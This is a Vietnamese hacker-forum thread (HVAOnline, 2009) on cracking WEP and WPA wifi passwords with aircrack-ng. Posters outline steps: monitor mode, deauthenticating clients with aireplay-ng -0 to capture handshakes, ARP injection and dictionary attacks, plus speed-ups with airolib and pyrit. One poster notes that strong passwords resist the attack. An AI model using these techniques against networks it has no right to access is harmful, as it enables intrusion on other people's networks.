Sặc !!! Cái này vừa thử ở cơ quan xong ! Coi theo bài gốc của aircrack-ng.org (chứ ko phải cái bài dịch cẩu thả ở trên) nhưng kết quả dù có cùng lúc 5-6 clients kết nối để auth vẫn không dò ra password. Bởi vì pass được dò trong file password.lst. Dò mãi ko ra nhưng khi tôi copy cái password của mình bỏ vào trong file ấy thì nó dò ra ngay ! Như vậy có thể kết luận chỉ cần đặt 1 password mạnh là có thể an tâm không bị dò ra !

Nhân đây cũng có 1 thắc mắc nhỏ, ở quá trình dò pass trên file, cái aircrack chỉ dò ở khoảng 200 dòng đầu của file password.lst, dù trong file có mấy ngàn dòng ? Các bạn cho biết lý do tại sao nhé !

Thân !
[Up] [Print Copy]
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 27/06/2009 05:16:52 (+0700) | #27 | 184740
dq0511
Member

[Minus]    0    [Plus]
Joined: 31/05/2007 12:12:40
Messages: 2
Offline
[Profile] [PM]
Quan trọng la bạn crack WEP hay la WPA2 . WPA2 thì hên xui, vì nó crack chủ yếu - dictionary , bruteforce.

@the shinichi:
Mình chỉ dùng airolib complie cái file password lại thì aircrack nó sẽ nhanh hơn rất nhiều ( khoảng 60k words/s trở lên +pyrit). Còn cái file password đào đâu ra thì 1 là dùng MD5 harsh ra , 2 là down về cho gọn ( có cai rainbow table 33gb : 1mil words, 1k+ essid) Còn để file txt dò thì rất chậm khoảng 300 - 500 words/s .

Hanjyung có nói:
Cái này là crack WEP-key 64 bit chứ WPA nỗi gì.
Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này.
http://thegioimang.org/forum/showthread.php?t=394  

bạn thật là TÀI... thấy 4-way hand shake + với lại opt password file kia ko...
Còn về window crack wifi thì 1 câu thôi " Wang nó đi, phí thời gian"


@tranduyminh:
mình xin chỉnh lại cho bạn 1 tí
Chạy airodump-ng xong thì phai deauth 1 client để lấy những cái packet đầu => 4way handshake. => ko có cái này ko inject hay làm j đc.
Bạn dịch thiếu phần này sẽ gây hiểu lầm giữa crack WEP và crack WPA.

@helllove:
Tại vì opt -w có nghĩa write xuống theo định dạng là *.cap + 1 file .txt. Nếu bạn ko tin thì bạn có thể vào trong thư mục root/user hoặc thư mục nào bạn -w xuống. Cho nên ở lệnh aircrack-ng thì phải để psk.cap vì nó sẽ báo no diectory found nếu để psk không.
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 14/11/2009 01:14:54 (+0700) | #28 | 198209
nhutdm
Elite Member

[Minus]    0    [Plus]
Joined: 02/06/2003 12:40:50
Messages: 45
Offline
[Profile] [PM] [WWW]

tranduyninh wrote:
cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra . 

Nếu bạn sử dụng Ubuntu thì có lẽ sẽ dễ dàng thực hiện hơn. Với wireless card Broadcom BCM43xx bạn có thể tìm driver b43-fwcutter. Mình tìm được một link hướng dẫn thêm patch cho kernel và biên dịch kernel cho Ubuntu 9.10 ở đây http://hacking-library.com/forum/viewtopic.php?f=36&t=201&start=0, bạn có thể làm theo hướng dẫn.
[Up] [Print Copy]
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 15/11/2009 12:39:23 (+0700) | #29 | 198316
[Avatar]
luckyluke113
Member

[Minus]    0    [Plus]
Joined: 19/02/2008 20:43:46
Messages: 21
Location: # init 0
Offline
[Profile] [PM] [Yahoo!]
Mình đang nghiên cứu cái Wireless Hacking nên có vài kinh nghiệm muốn chia sẻ với anh em :
1. Muốn hack được cái pass Wireless thì phải có client nào đó đang associated với AP , và Client đó nằm trong phạm vi "bắt sóng" của card mạng của bạn (nghe giang hồ đồn là hack được ngay cả khi ko có client bằng kỹ thuật korek và fragment nhưng mình test nhiều lần rồi mà vẫn ko thành công , có thể là do mấy cái AP mới nó khắc phục được cái này)
2. Các bước cơ bản thường là :
_ active cái NIC wireless (nếu nó chưa được active)
_ chuyển NIC qua chế độ Monitor , tùy cấu trúc phần phần cứng phần mềm mà interface của NIC wireless có tên là ath hay là wlan , và cũng tùy cấu trúc mà dùng lệnh iwconfig hoặc là airmon-ng để chuyển chế độ
_ dùng airodump-ng (hoặc kismet) để scan mạng ko dây , rồi chỉ định cái AP cụ thể nào cần tấn công
_ đối với WEP : đơn giản là đợi khi nào đủ gói (đợi cái cột data nó lên trên 50K cho chắc ăn) thì dùng aircrack thịt nó , nếu thằng client ít hoạt động thì khó mà đợi cho đến khi bắt được 50K , do đó phải dùng aireplay-ng -0 "đá" nó văng ra , nó sẽ phải gởi yêu cầu reconnect , rồi dùng aireplay-ng -3 bơm ARP vào (nên phục kích -3 trước rồi mới đá bằng -0 sau) , chi tiết dùng mấy cái lệnh nào thế nào thì các bác tự kiếm nhé
_ đối với WPA : quan trọng là bắt được cái 4-way handshake thì việc bẻ khóa mới thực hiện được. Cũng dùng aireplay-ng -0 đá nó ra , nó yêu cầu kết nối , ngay lúc đó cái sẽ chụp được cái 4-way handshake. Rồi dùng aircrack + từ điển thịt nó (hình như thằng aircrack này nó chỉ có thể dò từ khóa trong file từ điển chứ nó ko bít tổ hợp hay là bruteforce , nghĩa là trong từ điển phải có chính xác từ khóa trùng với password thì mới có kết quả)
... I'm a poor lonesome cowboy and a long far way from home ...
[Up] [Print Copy]
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/11/2009 10:02:15 (+0700) | #30 | 199447
vodoc_90
Member

[Minus]    0    [Plus]
Joined: 26/07/2007 11:56:15
Messages: 8
Offline
[Profile] [PM]
tớ thấy thầy tớ làm không đến 2 phút . i love master ... để hum nÀO đc học đến bài hack wifi sẽ bảo các pro ^^! .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|